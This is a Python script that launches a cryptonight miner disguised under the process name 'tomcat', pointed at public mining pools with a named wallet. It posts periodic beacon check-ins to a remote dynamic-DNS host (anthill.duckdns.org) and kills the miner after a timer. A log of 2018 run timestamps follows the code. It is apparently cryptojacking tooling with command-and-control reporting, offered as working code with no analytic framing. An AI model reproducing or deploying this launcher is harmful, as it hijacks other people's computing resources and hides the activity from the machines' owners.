import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:06.536242
#2018-02-17 17:34:05.041195
#2018-02-17 19:22:04.219634
#2018-02-17 21:11:07.184475
#2018-02-17 22:55:07.746929
#2018-02-18 00:41:03.340204
#2018-02-18 02:30:10.367886
#2018-02-18 04:18:07.202152
#2018-02-18 06:10:07.459367
#2018-02-18 08:01:02.087571
#2018-02-18 09:49:03.520278
#2018-02-18 11:36:04.545124
#2018-02-18 13:21:03.417807
#2018-02-18 15:11:03.465416
#2018-02-18 16:59:01.949057
#2018-02-18 18:46:03.480042
#2018-02-18 20:34:04.961342
#2018-02-18 22:20:09.054465
#2018-02-19 00:09:07.490796
#2018-02-19 01:56:01.890524
#2018-02-19 03:42:08.486604
#2018-02-19 05:27:04.564828
#2018-02-19 07:14:06.638226
#2018-02-19 09:02:04.943328
#2018-02-19 10:50:03.132472
#2018-02-19 12:37:08.256097
#2018-02-19 14:25:11.015002
#2018-02-19 16:13:07.080591
#2018-02-19 18:00:11.212562
#2018-02-19 19:46:03.627757
#2018-02-19 21:33:05.533057
#2018-02-19 23:18:06.417946
#2018-02-20 01:04:07.334105
#2018-02-20 02:53:05.273857
#2018-02-20 04:41:01.743562
#2018-02-20 06:24:07.611217
#2018-02-20 08:09:06.306856
#2018-02-20 09:54:04.511941
#2018-02-20 11:38:06.374201
#2018-02-20 13:27:06.871919
#2018-02-20 15:12:09.151700
#2018-02-20 16:56:08.655518
#2018-02-20 18:43:10.010916
#2018-02-20 20:34:03.207156
#2018-02-20 22:20:04.463372
#2018-02-21 00:01:02.205146
#2018-02-21 02:43:06.168334
#2018-02-21 04:34:05.438803
#2018-02-21 06:22:07.564186
#2018-02-21 08:08:05.126776
#2018-02-21 09:54:06.248681
#2018-02-21 11:42:06.210148
#2018-02-21 13:32:06.998779
#2018-02-21 15:18:05.748274
#2018-02-21 17:09:08.656795
#2018-02-21 18:57:07.057446
#2018-02-21 20:45:11.289786
#2018-02-21 22:29:08.256701
#2018-02-22 00:19:06.021014
#2018-02-22 02:06:06.300281
#2018-02-22 03:53:07.684756
#2018-02-22 05:41:02.023131
#2018-02-22 07:26:07.789441
#2018-02-22 09:14:01.824605
#2018-02-22 11:01:01.547134
#2018-02-22 12:46:08.679359
#2018-02-22 14:31:07.421100
#2018-02-22 16:19:05.865289
#2018-02-22 18:07:06.874879
#2018-02-22 19:55:08.624489
#2018-02-22 21:44:06.070066
#2018-02-22 23:32:08.276511
#2018-02-23 01:21:02.036979
#2018-02-23 03:07:07.905547
#2018-02-23 04:55:07.987552
#2018-02-23 06:41:08.145956
#2018-02-23 08:31:07.328999
#2018-02-23 10:44:05.684586
#2018-02-23 12:42:05.450683
#2018-02-23 14:25:09.400257
#2018-02-23 16:16:05.603364
#2018-02-23 18:04:05.095897
#2018-02-23 19:49:06.862461
#2018-02-23 21:33:05.909218
#2018-02-23 23:22:05.798219
#2018-02-24 01:13:03.870018
#2018-02-24 03:05:08.028641
#2018-02-24 04:51:05.598223
#2018-02-24 06:36:05.475207
#2018-02-24 08:24:05.136828
#2018-02-24 10:11:01.566865
#2018-02-24 12:05:07.308485
#2018-02-24 13:53:01.586903
#2018-02-24 15:32:02.064432
#2018-02-24 17:24:01.459023
#2018-02-24 19:11:07.291650
#2018-02-24 20:59:05.272920
#2018-02-24 23:28:06.488762
#2018-02-25 03:47:01.760954
#2018-02-25 07:32:07.765916